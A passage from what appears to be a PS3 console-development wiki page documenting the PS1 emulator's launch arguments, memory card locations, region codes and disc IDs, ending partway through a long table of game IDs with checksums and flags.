biosfile.<br /> <br /> ==== arguments ====<br /> <br /> From multiman.cpp source (line 2502) http://code.google.com/p/multiman/source/browse/source/multiman.cpp?r=8c5b662f1c54d4f95f646949cae3d033b15b1a2e<br /> <br /> {<br /> char* launchargv[9];<br /> memset(launchargv, 0, sizeof(launchargv));<br /> launchargv[0] = (char*)malloc(strlen(mc1)+1); strcpy(launchargv[0], mc1);<br /> launchargv[1] = (char*)malloc(strlen(mc2)+1); strcpy(launchargv[1], mc2);<br /> launchargv[2] = (char*)malloc( 5); strcpy(launchargv[2], &quot;0082&quot;);<br /> launchargv[3] = (char*)malloc( 5); strcpy(launchargv[3], &quot;1600&quot;);<br /> launchargv[4] = (char*)malloc(10); strcpy(launchargv[4], app_path);<br /> launchargv[5] = (char*)malloc( 2); strcpy(launchargv[5], &quot;1&quot;);<br /> launchargv[6] = (char*)malloc( 2); strcpy(launchargv[6], &quot;2&quot;); // full screen on/off = 2/1<br /> launchargv[7] = (char*)malloc( 2); strcpy(launchargv[7], &quot;1&quot;); // smoothing on/off = 1/0<br /> launchargv[8] = NULL;<br /> unload_modules();<br /> exitspawn((const char*) &quot;/dev_flash/ps1emu/ps1_netemu.self&quot;, (char* const*)launchargv, NULL, NULL, 0, 1001, SYS_PROCESS_PRIMARY_STACK_SIZE_1M);<br /> }<br /> else<br /> {<br /> char* launchargv[7];<br /> memset(launchargv, 0, sizeof(launchargv));<br /> launchargv[0] = (char*)malloc(strlen(mc1)+1); strcpy(launchargv[0], mc1);<br /> launchargv[1] = (char*)malloc(strlen(mc2)+1); strcpy(launchargv[1], mc2);<br /> launchargv[2] = (char*)malloc( 5); strcpy(launchargv[2], &quot;0082&quot;); // region<br /> launchargv[3] = (char*)malloc( 5); strcpy(launchargv[3], &quot;1200&quot;);<br /> launchargv[4] = (char*)malloc( 2); strcpy(launchargv[4], &quot;1&quot;); // full screen on/off = 2/1<br /> launchargv[5] = (char*)malloc( 2); strcpy(launchargv[5], &quot;1&quot;); // smoothing on/off = 1/0<br /> launchargv[6] = NULL;<br /> unload_modules();<br /> exitspawn((const char*) &quot;/dev_flash/ps1emu/ps1_emu.self&quot;, (char* const*)launchargv, NULL, NULL, 0, 1001, SYS_PROCESS_PRIMARY_STACK_SIZE_1M);<br /> }<br /> <br /> ===== ps1_emu.self =====<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! 7 arguments !! Name !! Example !! Notes<br /> |-<br /> | argv[0] || self starting location || dev_flash/ps1emu/ps1_emu.self ||<br /> |-<br /> | argv[1] || VM1-1 location || dev_hdd0/savedata/vmc/filename1.VM1 ||<br /> |-<br /> | argv[2] || VM1-2 location || dev_hdd0/savedata/vmc/filename2.VM1 ||<br /> |-<br /> | argv[3] || Regionnumber/TargetID || 0082 ||<br /> |-<br /> | argv[4] || unknown || 1200 ||<br /> |-<br /> | argv[5] || unknown || 1 ||<br /> |-<br /> | argv[6] || unknown || 0 ||<br /> |-<br /> |}<br /> <br /> ===== ps1_netemu.self =====<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! 7 arguments !! Name !! Example !! Notes<br /> |-<br /> | argv[0] || self starting location || dev_flash/ps1emu/ps1_netemu.self ||<br /> |-<br /> | argv[1] || ISO.BIN.EDAT location || ||<br /> |-<br /> | argv[2] || unknown || ||<br /> |-<br /> | argv[3] || unknown || ||<br /> |-<br /> | argv[4] || unknown || ||<br /> |-<br /> | argv[5] || unknown || ||<br /> |-<br /> | argv[6] || unknown || ||<br /> |-<br /> |}<br /> <br /> ===== ps1_newemu.self =====<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! 9 arguments !! Name !! Example !! Notes<br /> |-<br /> | argv[0] || self starting location || dev_flash/ps1emu/ps1_newemu.self ||<br /> |-<br /> | argv[1] || VM1-1 location || dev_hdd0/savedata/vmc/filename1.VM1 ||<br /> |-<br /> | argv[2] || VM1-2 location || dev_hdd0/savedata/vmc/filename2.VM1 ||<br /> |-<br /> | argv[3] || Regionnumber/TargetID || 0082 ||<br /> |-<br /> | argv[4] || unknown || 600 ||<br /> |-<br /> | argv[5] || unknown || null/empty ||<br /> |-<br /> | argv[6] || unknown || 1 ||<br /> |-<br /> | argv[7] || unknown || 2 ||<br /> |-<br /> | argv[8] || unknown || 2 ||<br /> |-<br /> |}<br /> <br /> ==== Savegames ====<br /> Location: /dev_hdd0/savedata/vmc &lt;br /&gt;<br /> Note: capitalisation of filename is important: name it xxx.VM1 instead of xxxx.vm1 (e.g. Internal Memory Card.VM1 for PSX/PSone, Internal Memory Card.VM2 for PS2/PStwo)<br /> <br /> The .VMx files appear to be raw memory card data:<br /> * [[Game_Saves#Virtual_Memory_Card_PS1_.28.VM1.29 | .VM1 Playstation 1 Memory cards]] can be edited by [http://www.psdevwiki.com/files/devtools/MemcardRex/ MemcardRex]&lt;!--// [[http://www.mediafire.com/?wf82vc4oeb932w3 MemcardRex v1.5]] //--&gt;<br /> * [[Game_Saves#Virtual_Memory_Card_PS2_.28.VM2.29 | .VM2 Playstation 2 Memory cards]] can be edited by [http://www.psdevwiki.com/files/devtools/mymc/ mymc]&lt;!--// [[http://www.csclub.uwaterloo.ca:11068/mymc/ mymc]] //--&gt;<br /> <br /> === Regioning ===<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! PS1&lt;br /&gt;DiscID's !! PS1&lt;br /&gt;Region !! PS3&lt;br /&gt;SKU suffix !! PS3&lt;br /&gt;TargetID's<br /> |-<br /> | SLPS&lt;br /&gt;SLPM&lt;br /&gt;SIPS&lt;br /&gt;PAPX&lt;br /&gt;PCPX || [http://en.wikipedia.org/wiki/NTSC-J NTSC-J]&lt;br /&gt;(Japan&amp;nbsp;and&amp;nbsp;Asia) || 00 (Japan)&lt;br /&gt;05 (South Korea)&lt;br /&gt;06 (Singapore / Malaysia)&lt;br /&gt;07 (Taiwan)&lt;br /&gt;09 (China)&lt;br /&gt;12 (Hong Kong) || 0x83&lt;br /&gt;0x86&lt;br /&gt;0x8A&lt;br /&gt;0x8B&lt;br /&gt;0x8D<br /> |-<br /> | SLUS&lt;br /&gt;SCUS&lt;br /&gt;SCUD&lt;br /&gt;SLUD&lt;br /&gt;PBPX&lt;br /&gt;LSP || [http://en.wikipedia.org/wiki/NTSC NTSC-U/C]&lt;br /&gt;(North&amp;nbsp;America) || 01 (North America)&lt;br /&gt;11 (Mexico) || 0x84&lt;br /&gt;0x88<br /> |-<br /> | SLES&lt;br /&gt;SCES&lt;br /&gt;SCED&lt;br /&gt;SLED || [http://en.wikipedia.org/wiki/PAL PAL]&lt;br /&gt;(Europe&amp;nbsp;and&amp;nbsp;Oceania) || 02 (Australia / New Zealand)&lt;br /&gt;03 (U.K. / Ireland)&lt;br /&gt;04 (Europe / Middle East / Africa)&lt;br /&gt;08 (Russia / India) || 0x89&lt;br /&gt;0x87&lt;br /&gt;0x85&lt;br /&gt;0x8C<br /> |-<br /> | SLPS&lt;br /&gt;SLPM&lt;br /&gt;SIPS&lt;br /&gt;PAPX&lt;br /&gt;PCPX&lt;br /&gt;SLUS&lt;br /&gt;SCUS&lt;br /&gt;SCUD&lt;br /&gt;SLUD&lt;br /&gt;PBPX&lt;br /&gt;LSP&lt;br /&gt;SLES&lt;br /&gt;SCES&lt;br /&gt;SCED&lt;br /&gt;SLED || Region Free || Debugging Station || 0x82<br /> |-<br /> |}<br /> ==== DiscID explained ====<br /> * The first letter indicates the storage format (always S=CD/DVD for PSX/PSone and PS2/PStwo, for PS3 it is B=Bluray).<br /> * The second letter indicates if the game is first party (C = Sony), or licensed from third party (L = others).<br /> * The third letter indicates: A=Asia, P or J=Japan, U=United States, or E=Europe (K = HongKong).<br /> * The last letter indicates the type: D = Demo, S = Full Retail Game, M = ?.<br /> Note that for some third party games, Sony may take it and repackage with appropriate material for other territories, thus the game become first party as well.<br /> <br /> DiscID ([[Productcode]]) reference: http://sonyindex.com/ &lt;br /&gt;<br /> e.g. PS3 Bluray:<br /> Japan [BCAS, BCJS, BLAS, BLJM, BLJS]<br /> US [BCUS, BLUS, BCUD]<br /> EU [BCES, BLES, BCED]<br /> HongKong [BCKS, BLKS, BCKD] <br /> <br /> Sidestep, PSVita uses PCSF / PCSB : http://forum.trophies-ps3.de/spiele-and-trophaeen/90720-die-vita-pcsf-pcsb-liste.html (Sony = f = first party, B = backparty release ?)<br /> <br /> ===== DiscID ([[Productcode]]) in ps1_emu =====<br /> <br /> {|class=&quot;wikitable sortable&quot;<br /> |-<br /> ! ID in emu.self !! Region !! DiscID !! Title !! unk !! checksum !! flags !! FW<br /> |-<br /> | SLPS_023.64 || Jap || SLPS-02364 || Chrono Cross [Disc1of2] || 1 || 40b572aa || 0000001500000003 || 1.02++<br /> |-<br /> | SLPS_023.65 || Jap || SLPS-02365 || Chrono Cross [Disc2of2] || 1 || 55e87206 || 0000001500000003 || 1.02++<br /> |-<br /> | SLPM_860.28 || Jap || SLPM-86028 || Final Fantasy IV || 3 || 770f6f03 || 00000004000000c8 || 1.02++<br /> |-<br /> | SLPS_000.13 || Jap || SLPS-00013 || Raiden Project || 3 || 9dc97376 || 00000004000000c8 || 1.02++<br /> |-<br /> | SLPS_023.61 || Jap || SLPS-02361 || Touge Max G || 1 || c1556eb3 || 0000000100000001 || 1.02++<br /> |-<br /> | SLPS_013.43 || Jap || SLPS-01343 || Rebus || 1 || 2b2270f6 || 0000000100000080 || 1.02++<br /> |-<br /> | SLPS_007.70 || Jap || SLPS-00770 || Final Fantasy Tactics || 1 || ba3573e7 || 0000000100000010 || 1.02++<br /> |-<br /> | SLPS_017.72 || Jap || SLPS-01772 || Squaresoft Data Disc 2 [Chocobo no Fushigi na Dungeon 2 Bonus Disc] || 2 || 3e6e7597 || 00000007fffffa00 || 1.02++<br /> |-<br /> | SLPS_035.01 || Jap || SLPS-03501 || Final Fantasy II [Final Fantasy I+II - Premium Package] || 1 || 47146c30 || 0000001500000003 || 1.02++<br /> |-<br /> | SLPS_035.02 || Jap || SLPS-03502 || Final Fantasy II || 1 || 32256c55 || 0000001500000003 || 1.02++<br /> |-<br /> | SLPS_023.71 || Jap || SLPS-02371 || Fever - Sankyo Koushiki Pachinko Simulation || 1 || d59774b8 || 0000000100000020 || 1.02++<br /> |-<br /> | SLPS_007.50 || Jap || SLPS-00750 || Xevious 3D-G+ || 1 || edad71d8 || 0000000100000040 || 1.02++<br /> |-<br /> | SLPS_007.00 || Jap || SLPS-00700 || Final Fantasy VII [Disc1of3] || 1 || 14dd7664 || 0000001500000003 || 1.02++<br /> |-<br /> <br /> <br /> | SLPS_007.01 || Jap || SLPS-00701 || Final Fantasy VII [Disc2of3] || 1 || 498a7601 || 0000001500000003 || <br /> |-<br /> | SLPS_007.02 || Jap || SLPS-00702 || Final Fantasy VII [Disc3of3] || 1 || 78eb7645 || 0000001500000003 || <br /> |-<br /> <br /> <br /> | SLPS_008.30 || Jap || SLPS-00830 || Ace Combat 2 || 1 || 9ea572ab || 0000001500000003 || 1.02++<br /> |-<br /> | SLPM_862.26 || Jap || SLPM-86226 || Glay Station - Glay Complete Works [Disc1of2] || 1 || d9fb6e40 || 00000007fffff700 || 1.02++<br /> |-<br /> | SLPS_034.95 || Jap || SLPS-03495 || Kamen Rider Ryuki || 3 || 76fa6c8f || 0000000800000001 || 1.02++<br /> |-<br /> | SLPM_861.62 || Jap || SLPM-86162 || World Soccer - Jikkyou Winning Eleven 3 - Final Version || 1 || 171a6e8c || 0000000300000708 || 1.02++<br /> |-<br /> | SLPM_861.62 || Jap || SLPM-86162 || World Soccer - Jikkyou Winning Eleven 3 - Final Version || 1 || 3b716e92 || 0000000300000708 || 1.02++<br /> |-<br /> | SCPS_100.92 || Jap || SCPS-10092 || Doko Demo Issyo || 1 || 985c6d1c || 0000000100010000 || 1.02++<br /> |-<br /> | SLPM_870.56 || Jap || SLPM-87056 || World Soccer - Winning Eleven 2002 || 1 || c18c6d68 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_014.34 || Jap || SLPS-01434 || 3D Kakutou Tsukuru || 1 || 33196d96 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_021.08 || Jap || SLPS-02108 || Tron ni Kobun [Disc1of2] || 2 || fee172c6 || 0000000a00000000 || 1.02++<br /> |-<br /> | SLPS_021.09 || Jap || SLPS-02109 || Tron ni Kobun [Disc2of2] || 2 || ecb1743a || 0000000a00000000 || 1.02++<br /> |-<br /> | SLPS_022.27 || Jap || SLPS-02227 || Simple 1500 Series Vol.014 - The Block Kuzushi || 1 || 8212727f || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_027.36 || Jap || SLPS-02736 || Senkai Taisen - TV Animation Senkaiden Houshin Engi yori || 1 || 24bc6f0e || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_000.40 || Jap || SLPS-00040 || Tekken || 1 || 3a6f72f5 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_014.21 || Jap || SLPS-01421 || Kagero - Kokumeikan Shinshou || 1 || 5e466c72 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPM_864.90 || Jap || SLPM-86490 || Muscle Ranking - Kinniku Banzuke - Road to Sasuke || 1 || e94570d4 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_007.52 || Jap || SLPS-00752 || Pachi-Slot Kanzen Kouryaku 1 - Universal Koushiki Guide Vol.1 || 1 || 40a7270 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_003.04 || Jap || SLPS-00304 || Noel - Not Digital [Special Edition] [Disc1of2] || 1 || 2d507191 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_003.04 || Jap || SLPS-00304 || Noel - Not Digital [Special Edition] [Disc1of2] || 1 || b4570c7 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_003.05 || Jap || SLPS-00305 || Noel - Not Digital [Special Edition] [Disc2of2] || 1 || 2f7c6d6c || 0000000100010000 || 1.02++<br /> |-<br /> | SLPM_860.97 || Jap || SLPM-86097 || Jikkyou Powerful Pro Yakyuu '98 Kaimaku-ban || 1 || c15f7120 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPM_860.98 || Jap || SLPM-86098 || Metal Gear Solid [Pilot] [Jikkyou Powerful Pro Yakyuu '98 Kaimakuban - Bonus Disc] || 1 || eb946d0a || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_016.09 || Jap || SLPS-01609 || Million Classic [Disc1of2] || 1 || 60f06ea0 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_016.10 || Jap || SLPS-01610 || Million Classic [Disc2of2] || 1 || e90a6ce3 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_024.12 || Jap || SLPS-02412 || Puyo Puyoon - Car-Kun to Issho || 1 || ab3b70e7 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_025.70 || Jap || SLPS-02570 || Kidou Senshi Gundam - Giren no Yabou - Zeon no Keifu [Disc1of2] || 2 || c47c6d81 || 0000000a00000000 || 1.02++<br /> |-<br /> | SLPS_025.71 || Jap || SLPS-02571 || Kidou Senshi Gundam - Giren no Yabou - Zeon no Keifu [Disc2of2] || 2 || 1ede6edc || 0000000a00000000 || 1.02++<br /> |-<br /> | SLPS_016.83 || Jap || SLPS-01683 || Simple 1500 Series Vol.005 - The Igo || 1 || 7ffa79b2 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_010.08 || Jap || SLPS-01008 || Einhander || 2 || a72b7071 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_023.68 || Jap || SLPS-02368 || Marvel vs. Capcom - Clash of the Super Heroes - EX Edition || 1 || 12e17661 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_024.60 || Jap || SLPS-02460 || Koudelka [Disc1of4] || 2 || aa1473a6 || 0000000a00000000 || 1.02++<br /> |-<br /> | SLPS_024.61 || Jap || SLPS-02461 || Koudelka [Disc2of4] || 2 || 8cb57276 || 0000000a00000000 || 1.02++<br /> |-<br /> | SLPS_024.62 || Jap || SLPS-02462 || Koudelka [Disc3of4] || 2 || 344473b8 || 0000000a00000000 || 1.02++<br /> |-<br /> | SLPS_024.63 || Jap || SLPS-02463 || Koudelka [Disc4of4] || 2 || 689a72b4 || 0000000a00000000 || 1.02++<br /> |-<br /> | SCPS_101.36 || Jap || SCPS-10136 || Gunparade March || 1 || aa4070a9 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_017.17 || Jap || SLPS-01717 || Bomberman || 1 || ead56ab7 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_024.69 || Jap || SLPS-02469 || DX Jinsei Game III - The Game of Life || 1 || 302c70d1 || 0000000900000001 || 1.02++<br /> |-<br /> | SLPM_869.63 || Jap || SLPM-86963 || DX Jinsei Game IV - The Game of Life || 1 || aef26b24 || 0000000900000001 || 1.11+<br /> |-<br /> | SLPS_001.94 || Jap || SLPS-00194 || Wizard's Harmony || 1 || b01d7540 || 0000000c00000002 || 1.02++<br /> |-<br /> | SLPS_005.50 || Jap || SLPS-00550 || Shin Super Robot Taisen || 1 || 77327123 || 0000001000063fe1 || 1.02++<br /> |-<br /> | SLPS_005.50 || Jap || SLPS-00550 || Shin Super Robot Taisen || 1 || 505971b4 || 0000001000063fe1 || 1.02++<br /> |-<br /> | SLPS_007.87 || Jap || SLPS-00787 || Shin Super Robot Taisen [Special Edition] || 1 || cf9d72df || 0000001000063fe1 || 1.02++<br /> |-<br /> | SLPM_871.87 || Jap || SLPM-87187 || DX Jinsei Game V - The Game of Life || 1 || ed346cdc || 0000000900000001 || 1.02++<br /> |-<br /> | SLPM_863.81 || Jap || SLPM-86381 || Muscle Ranking - Kinniku Banzuke Vol.1 - Ore ga Saikyou no Otoko da! || 1 || f04b7147 || 000000101090c229 || 1.02++<br /> |-<br /> | SLPS_004.77 || Jap || SLPS-00477 || Wing Commander III - Heart of the Tiger [Disc1of4] || 1 || 448373e5 || 0000000d00000001 || 1.02++<br /> |-<br /> | SLPS_016.11 || Jap || SLPS-01611 || Mikagura Shoujo Tanteidan [Disc1of4] || 1 || 68ed73d3 || 0000000c00000004 || 1.02++<br /> |-<br /> | SLPM_862.68 || Jap || SLPM-86268 || Taikou Risshiden III || 1 || d046df5 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPM_862.68 || Jap || SLPM-86268 || Taikou Risshiden III || 1 || 5af46e00 || 0000000100010000 || 1.02++<br /> |-<br /> | SLPS_017.74 || Jap || SLPS-01774 || Next Tetris, The || 1 || affd73f0 || 0000000100000001 || 1.02++<br /> |-<br /> | SLPS_005.55 || Jap || SLPS-00555 || Soul Edge || 1 || 9faf7086 || 00000005000000c8 || 1.02++<br /> |-<br /> | SLPM_863.17 || Jap || SLPM-86317 || J.League 1999 Perfect Striker || 1 || 4e437226 || 0000000600000064 || 1.02++<br /> |-<br /> | unknown || || || || 1 || cf07737f || 0000001400000004 || 1.02++<br /> |-<br /> <br /> <br /> | unknown || || || || 1 || 18fd70a4 || 0000000c00000004 || <br /> |-<br /> | SLPS_017.60 || Jap || SLPS-01760 || Janpai Yuugi '99 - Tanuki no Kawazanyou || 1 || c24577b9 || 0000000c00000004 || 1.02++<br /> |-<br /> | SLPS_013.24 || Jap || SLPS-01324 || Thoroughbred Breeder - Sekai Seiha-hen || 1 || 5a7f712a || 0000000100000080 || 1.02++<br /> |-<br /> | SLPS_004.58 || Jap || SLPS-00458 || Simulation Zoo || 1 || 9f7d6e65 || 0000000100000200 || 1.02++<br /> |-<br /> | SLPS_008.31 || Jap || SLPS-00831 || Hatsukoi Barentain || 1 || b3127504 || 0000000c00000004 || 1.02++<br /> |-<br /> | SLPS_005.90 || Jap || SLPS-00590 || Voice Paradice Excella [Disc1of2] || 1 || c0d67577 || 0000000c00000004 || 1.02++<br /> |-<br /> <br /> <br /> | SLPS_018.80 || Jap || SLPS-01880 || Final Fantasy VIII [Disc1of4] || 1 || d8446e20 || 0000001500000003 || <br /> |-<br /> | SLPS_018.81 || Jap || SLPS-01881 || Final Fantasy VIII [Disc2of4] || 1 || d4c76d1b || 0000001500000003 || <br /> |-<br /> | SLPS_018.82 || Jap || SLPS-01882 || Final Fantasy VIII [Disc3of4] || 1 || 18126e07 || 0000001500000003 || <br /> |-<br /> | SLPS_018.83 || Jap || SLPS-01883 || Final Fantasy VIII [Disc4of4] || 1 || 12376e34 || 0000001500000003 || <br /> |-<br /> | SLPS_010.50 || Jap || SLPS-01050 || Namco Museum Encore || 1 || bdac756e || 0000001500000003 || <br /> |-<br /> | SCPS_101.38 || Jap || SCPS-10138 || Bealphareth || 1 || 1d826df0 || 0000001500000003 || <br /> |-<br /> | SLPS_012.99 || Jap || SLPS-01299 || Tail Concerto || 1 || e9a46c06 || 0000000100000080 || <br /> |-<br /> | SLPS_018.49 || Jap || SLPS-01849 || Zen-Nippon Pro Wrestling - Ouja no Tamashii || 1 || e7bc6eee || 0000001500000003 || <br /> |-<br /> | SLPS_028.44 || Jap || SLPS-02844 || Digimon World 2 || 1 || 72d47009 || 0000001500000003 || <br /> |-<br /> | SLPS_001.96 || Jap || SLPS-00196 || Dai-4-Ji Super Robot Taisen S || 1 || a8db7169 || 0000001500000003 || <br /> |-<br /> | SLPS_013.83 || Jap || SLPS-01383 || FIFA Road to World Cup '98 || 1 || 2e3872b6 || 0000001500000003 || <br /> |-<br /> | SLPS_914.44 || Jap || SLPS-91444 || Armored Core - Master of Arena [PSone Books] [Disc1of2] || 1 || b9317410 || 0000001500000003 || <br /> |-<br /> | SLPS_911.10 || Jap || SLPS-91110 || Armored Core - Project Phantasma [PlayStation the Best] || 1 || 6b187157 || 0000001500000003 || <br /> |-<br /> | SLPS_012.22 || Jap || SLPS-01222 || BioHazard 2 [Disc1of2] || 1 || f5f773c5 || 0000001500000003 || <br /> |-<br /> | SLPS_012.23 || Jap || SLPS-01223 || BioHazard 2 [Disc2of2] || 1 || 899673b3 || 0000001500000003 || <br /> |-<br /> | SLPS_017.51 || Jap || SLPS-01751 || Elie no Atelier - Atelier Elie || 1 || bcdf6fa3 || 0000001500000003 || <br /> |-<br /> | SLPS_911.80 || Jap || SLPS-91180 || Elie no Atelier - Atelier Elie [PlayStation the Best] || 1 || 8047091 || 0000001500000003 || <br /> |-<br /> | SLPS_013.48 || Jap || SLPS-01348 || G-Darius || 1 || d59c6ed3 || 0000001500000003 || <br /> |-<br /> | SCPS_913.25 || Jap || SCPS-91325 || Um Jammer Lammy [PSone Books] || 1 || 286070c5 || 0000001500000003 || <br /> |-<br /> | SLPS_012.58 || Jap || SLPS-01258 || Yuukyuu Gensoukyoku 2nd Album || 1 || d1b173a8 || 0000001500000003 || <br /> |-<br /> | SCPS_101.03 || Jap || SCPS-10103 || Robbit Mon Dieu || 1 || 6e516dad || 0000001500000003 || <br /> |-<br /> | SLPM_862.47 || Jap || SLPM-86247 || Metal Gear Solid - Integral [Disc1of3] || 1 || 5ff06cad || 0000001500000003 || <br /> |-<br /> | SLPM_862.48 || Jap || SLPM-86248 || Metal Gear Solid - Integral [Disc2of3] || 1 || e7796ded || 0000001500000003 || <br /> |-<br /> | SLPM_862.49 || Jap || SLPM-86249 || Metal Gear Solid - Integral [Disc3of3] || 1 || 4a136c00 || 0000001500000003 || <br /> |-<br /> | SLPS_012.00 || Jap || SLPS-01200 || Tomb Raider 2 || 1 || 805d73aa || 0000001500000003 || <br /> |-<br /> | SCPS_100.03 || Jap || SCPS-10003 || Crime Crackers || 1 || ed04760d || 0000001500000003 || <br /> |-<br /> | SCPS_100.93 || Jap || SCPS-10093 || Minna no Golf 2 || 1 || a0546cf8 || 0000001500000003 || <br /> |-<br /> | SLPS_021.67 || Jap || SLPS-02167 || Echo Night #2 || 1 || e8336ff5 || 0000001500000003 || <br /> |-<br /> | SLPS_006.17 || Jap || SLPS-00617 || Tomb Raider || 1 || d780729c || 0000001500000003 || <br /> |-<br /> | SCPS_100.50 || Jap || SCPS-10050 || Poporogue || 1 || 50ec6c67 || 0000001500000003 || <br /> |-<br /> | SCPS_100.50 || Jap || SCPS-10050 || Poporogue || 1 || d0606e35 || 0000001500000003 || <br /> |-<br /> | SCPS_913.12 || Jap || SCPS-91312 || Poporogue [PSone Books] || 1 || fa176c5a || 0000001500000003 || <br /> |-<br /> | SLPS_863.63 || Jap || ((SLPM-86363)) || Chaos Break || 1 || d40f7363 || 0000001500000003 || <br /> |-<br /> | SLPS_006.77 || Jap || SLPS-00677 || F-1 Grand Prix '96 - Team Unei Simulation || 1 || 4ab472c3 || 0000001500000003 || <br /> |-<br /> | SLPM_862.52 || Jap || SLPM-86252 || Dance Dance Revolution - 2nd Remix || 1 || 77ef6e45 || 0000001500000003 || <br /> |-<br /> | SLPM_863.70 || Jap || SLPM-86370 || Dance Dance Revolution - 2nd Remix Append Club Version Vol.1 || 1 || 4f9170f4 || 0000001500000003 || <br /> |-<br /> | SCPS_101.12 || Jap || SCPS-10112 || Popolocrois Monogatari II [Disc1of3] || 1 || 9d7e6dc3 || 0000001500000003 || <br /> |-<br /> | SCPS_100.60 || Jap || SCPS-10060 || Rapid Racer || 1 || 4bca6fd6 || 0000001500000003 || <br /> |-<br /> | SLPS_007.17 || Jap || SLPS-00717 || Tilk - Aoi Umi kara Kita Shoujo || 1 || 9f01700a || 0000001500000003 || <br /> |-<br /> | SLPS_010.00 || Jsp || SLPS-01000 || Front Mission 2 || 1 || 123270ee || 0000001500000003 || <br /> |-<br /> | SLPM_873.31 || Jap || SLPM-86331 || zzz_untranslated_japanese_title || 1 || fda96f69 || 0000001500000003 || <br /> |-<br /> | SLPS_007.77 || Jap || SLPS-00777 || Derby Stallion - Thoroughbred Simulation Game || 1 || d5197559 || 0000001500000003 || <br /> |-<br /> | SLPS_022.99 || Jap || SLPS-02299 || Derby Stallion '99 || 1 || 7b146d4e || 0000001500000003 || <br /> |-<br /> | SLPM_860.86 || Jap || SLPM-86086 || World Soccer - Jikkyou Winning Eleven 3 - World Cup France '98 || 1 || 232d6e09 || 0000001500000003 || <br /> |-<br /> | SLPS_018.20 || Jap || SLPS-01820 || Palm Town || 1 || f0b06d6a || 0000001500000003 || <br /> |-<br /> | SLPS_012.42 || Jap || SLPS-01242 || Motteke Tamago with Ganbare Kamonohasi || 1 || c9497214 || 0000001500000003 || <br /> |-<br /> | SLPS_020.38 || Jap || SLPS-02038 || Racing Lagoon || 1 || 5e9b6cfc || 0000001500000003 || <br /> |-<br /> | SLPM_872.30 || Jap || SLPM-87230 || Wai Wai Kart [MajorWave 1500 Series] || 1 || c72770b2 || 0000001500000003 || <br /> |-<br /> | SCPS_101.29 || Jap || SCPS-10129 || Dotchi Mecha! || 1 || 9b4e6ef0 || 0000001500000003 || <br /> |-<br /> | SLPS_018.18 || Jap || SLPS-01818 || Langrisser IV &amp; V Final Edition [Disc1of2] || 1 || 2f686de7 || 0000001500000003 || <br /> |-<br /> | SLPS_018.19 || Jap || SLPS-01819 || Langrisser IV &amp; V Final Edition [Disc2of2] || 1 || bcf36f23 || 0000001500000003 || <br /> |-<br /> | SLPS_007.23 || Jap || SLPS-00723 || FEDA 2 - White Surge - The Platoon || 1 || 2e5a6fc9 || 0000001500000003 || <br /> |-<br /> | SLPS_007.77 || Jap || SLPS-00777 || Derby Stallion - Thoroughbred Simulation Game || 1 || 5837561 || 0000001500000003 || <br /> |-<br /> | SLPS_001.71 || Jap || SLPS-00171 || Hi-Octane || 1 || 41ce713c || 0000001500000003 || <br /> |-<br /> | SCPS_180.02 || Jap || SCPS-18002 || Parappa Rapper || 1 || 9a7a70eb || 0000001500000003 || <br /> |-<br /> | SLPS_022.32 || Jap || SLPS-02232 || Getter Robo Daikessen! (The Big Battle) || 1 || 5c5f712a || 0000001500000003 || <br /> |-<br /> | SCPS_100.59 || Jap || SCPS-10059 || Legaia Densetsu, The || 1 || 7766b95 || 0000001500000003 || <br /> |-<br /> | SLPM_865.00 || Jap || SLPM-86500 || Dragon Quest VII - Eden no Senshitachi [Disc1of2] || 1 || 233570b0 || 0000001500000003 || <br /> |-<br /> | SLPM_865.01 || Jap || SLPM-86501 || Dragon Quest VII - Eden no Senshitachi [Disc2of2] || 1 || 8a387104 || 0000001500000003 || <br /> |-<br /> | SLPM_865.00 || Jap || SLPM-86500 || Dragon Quest VII - Eden no Senshitachi [Disc1of2] || 1 || 1fcb70d6 || 0000001500000003 || <br /> |-<br /> | SLPM_865.01 || Jap || SLPM-86501 || Dragon Quest VII - Eden no Senshitachi [Disc2of2] || 1 || be9670e6 || 0000001500000003 || <br /> |-<br /> | SLPM_865.00 || Jap || SLPM-86500 || Dragon Quest VII - Eden no Senshitachi [Disc1of2] || 1 || ccb870ed || 0000001500000003 || <br /> |-<br /> | SLPM_865.01 || Jap || SLPM-86501 || Dragon Quest VII - Eden no Senshitachi [Disc2of2] || 1 || 54e370fd || 0000001500000003 || <br /> |-<br /> | SLPS_020.00 || Jap || SLPS-02000 || Final Fantasy IX [Disc1of4] || 1 || 69be6d66 || 0000001500000003 || <br /> |-<br /> | SLPS_020.01 || Jap || SLPS-02001 || Final Fantasy IX [Disc2of4] || 1 || 6be16c3a || 0000001500000003 || <br /> |-<br /> | SLPS_020.02 || Jap || SLPS-02002 || Final Fantasy IX [Disc3of4] || 1 || 32da6d5e || 0000001500000003 || <br /> |-<br /> | SLPS_020.03 || Jap || SLPS-02003 || Final Fantasy IX [Disc4of4] || 1 || 70f66d44 || 0000001500000003 || <br /> |-<br /> | SLPM_869.16 || Jap || SLPM-86916 || Dragon Quest IV - Michibikareshi Monotachi || 1 || c20e6fdd || 0000001500000003 || <br /> |-<br /> <br /> <br /> <br /> | SLES_036.30 || Eur || SLES-03630 || X-Men - Mutant Academy 2 || 1 || 2f872b9 || 0000000100000001 || 1.02++<br /> |-<br 